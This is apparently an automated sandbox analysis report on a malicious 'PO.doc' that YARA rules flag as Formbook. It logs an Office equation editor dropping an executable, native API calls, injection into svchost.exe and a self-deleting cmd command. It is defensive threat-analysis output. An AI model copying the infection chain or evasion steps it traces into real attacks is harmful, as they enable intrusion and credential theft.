          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe
          .NET source code contains very large strings
          Source: ibefrankszx[1].exe.2.dr, Castle.Samples.Extensibility/UI/Input.cs, Long String: Length: 75776
          Source: ibeframnk863.exe.2.dr, Castle.Samples.Extensibility/UI/Input.cs, Long String: Length: 75776
          Source: 4.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.cs, Long String: Length: 75776
          Source: 5.2.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.cs, Long String: Length: 75776
          Source: 5.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.cs, Long String: Length: 75776
          Source: 6.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.cs, Long String: Length: 75776
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A350 NtCreateFile,6_2_0041A350
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A400 NtReadFile,6_2_0041A400
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A480 NtClose,6_2_0041A480
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A530 NtAllocateVirtualMemory,6_2_0041A530
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A34A NtCreateFile,6_2_0041A34A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A3A3 NtReadFile,6_2_0041A3A3
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A47A NtClose,6_2_0041A47A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041A52B NtAllocateVirtualMemory,6_2_0041A52B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A700C4 NtCreateFile,LdrInitializeThunk,6_2_00A700C4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A70078 NtResumeThread,LdrInitializeThunk,6_2_00A70078
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00A70048
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6F9F0 NtClose,LdrInitializeThunk,6_2_00A6F9F0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6F900 NtReadFile,LdrInitializeThunk,6_2_00A6F900
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00A6FAE8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_00A6FAD0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_00A6FBB8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00A6FB68
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_00A6FC90
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_00A6FC60
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,6_2_00A6FD8C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00A6FDC0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_00A6FEA0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_00A6FED0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,6_2_00A6FFB4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A710D0 NtOpenProcessToken,6_2_00A710D0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A70060 NtQuerySection,6_2_00A70060
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A701D4 NtSetValueKey,6_2_00A701D4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A7010C NtOpenDirectoryObject,6_2_00A7010C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A71148 NtOpenThread,6_2_00A71148
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A707AC NtCreateMutant,6_2_00A707AC
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6F8CC NtWaitForSingleObject,6_2_00A6F8CC
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A71930 NtSetContextThread,6_2_00A71930
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6F938 NtWriteFile,6_2_00A6F938
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FAB8 NtQueryValueKey,6_2_00A6FAB8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FA20 NtQueryInformationFile,6_2_00A6FA20
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FA50 NtEnumerateValueKey,6_2_00A6FA50
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FBE8 NtQueryVirtualMemory,6_2_00A6FBE8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00A6FB50 NtCreateKey,6_2_00A6FB50
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A000C4 NtCreateFile,LdrInitializeThunk,8_2_00A000C4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A007AC NtCreateMutant,LdrInitializeThunk,8_2_00A007AC
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FF9F0 NtClose,LdrInitializeThunk,8_2_009FF9F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FF900 NtReadFile,LdrInitializeThunk,8_2_009FF900
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFAB8 NtQueryValueKey,LdrInitializeThunk,8_2_009FFAB8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_009FFAD0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_009FFAE8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_009FFBB8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFB50 NtCreateKey,LdrInitializeThunk,8_2_009FFB50
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_009FFB68
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,8_2_009FFC60
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFD8C NtDelayExecution,LdrInitializeThunk,8_2_009FFD8C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_009FFDC0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_009FFED0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFFB4 NtCreateSection,LdrInitializeThunk,8_2_009FFFB4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A010D0 NtOpenProcessToken,8_2_00A010D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A00060 NtQuerySection,8_2_00A00060
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A00078 NtResumeThread,8_2_00A00078
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A00048 NtProtectVirtualMemory,8_2_00A00048
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A001D4 NtSetValueKey,8_2_00A001D4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A0010C NtOpenDirectoryObject,8_2_00A0010C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A01148 NtOpenThread,8_2_00A01148
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FF8CC NtWaitForSingleObject,8_2_009FF8CC
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A01930 NtSetContextThread,8_2_00A01930
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FF938 NtWriteFile,8_2_009FF938
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFA20 NtQueryInformationFile,8_2_009FFA20
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFA50 NtEnumerateValueKey,8_2_009FFA50
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFBE8 NtQueryVirtualMemory,8_2_009FFBE8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFC90 NtUnmapViewOfSection,8_2_009FFC90
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFC30 NtOpenProcess,8_2_009FFC30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFC48 NtSetInformationFile,8_2_009FFC48
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A00C40 NtGetContextThread,8_2_00A00C40
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A01D80 NtSuspendThread,8_2_00A01D80
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFD5C NtEnumerateKey,8_2_009FFD5C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFEA0 NtReadVirtualMemory,8_2_009FFEA0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFE24 NtWriteVirtualMemory,8_2_009FFE24
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFFFC NtCreateProcessEx,8_2_009FFFFC
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_009FFF34 NtQueueApcThread,8_2_009FFF34
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A350 NtCreateFile,8_2_0009A350
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A400 NtReadFile,8_2_0009A400
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A480 NtClose,8_2_0009A480
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A530 NtAllocateVirtualMemory,8_2_0009A530
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A34A NtCreateFile,8_2_0009A34A
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A3A3 NtReadFile,8_2_0009A3A3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A47A NtClose,8_2_0009A47A
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009A52B NtAllocateVirtualMemory,8_2_0009A52B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E90000 page execute and read and write
          Source: ibefrankszx[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ibeframnk863.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: PO.doc Virustotal: Detection: 43%
          Source: PO.doc ReversingLabs: Detection: 28%
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Process created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Process created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$PO.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE2CF.tmp
          Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@12/8@3/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: ibeframnk863.exe, svchost.exe
          Source: Binary string: svchost.pdb source: ibeframnk863.exe, 00000006.00000002.505477626.00000000006A1000.00000004.00000020.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: ibefrankszx[1].exe.2.dr, Castle.Samples.Extensibility/UI/ApplicationShell.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ibeframnk863.exe.2.dr, Castle.Samples.Extensibility/UI/ApplicationShell.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 4_2_002E6B84 push dword ptr [ebp-17000000h]; iretd 4_2_002E6B8A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 4_2_002E4DE8 pushfd ; retf 4_2_002E4DE9
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0040E3CE push esi; iretd 6_2_0040E3D6
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00417C03 push edi; iretd 6_2_00417C19
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0040E419 push ds; ret 6_2_0040E41C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041D4F2 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041D4FB push eax; ret 6_2_0041D562
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_00417C80 push edi; iretd 6_2_00417C19
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041D4A5 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Code function: 6_2_0041D55C push eax; ret 6_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00A0DFA1 push ecx; ret 8_2_00A0DFB4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0008E3CE push esi; iretd 8_2_0008E3D6
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0008E419 push ds; ret 8_2_0008E41C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009D4A5 push eax; ret 8_2_0009D4F8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009D4FB push eax; ret 8_2_0009D562
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009D4F2 push eax; ret 8_2_0009D4F8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009D55C push eax; ret 8_2_0009D562
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009D7C1 pushfd ; iretd 8_2_0009D7C2
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00097C03 push edi; iretd 8_2_00097C19
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00097C80 push edi; iretd 8_2_00097C19
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0009DD5E push eax; ret 8_2_0009DD60
          Source: initial sample Static PE information: section name: .text entropy: 7.14505383023
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe

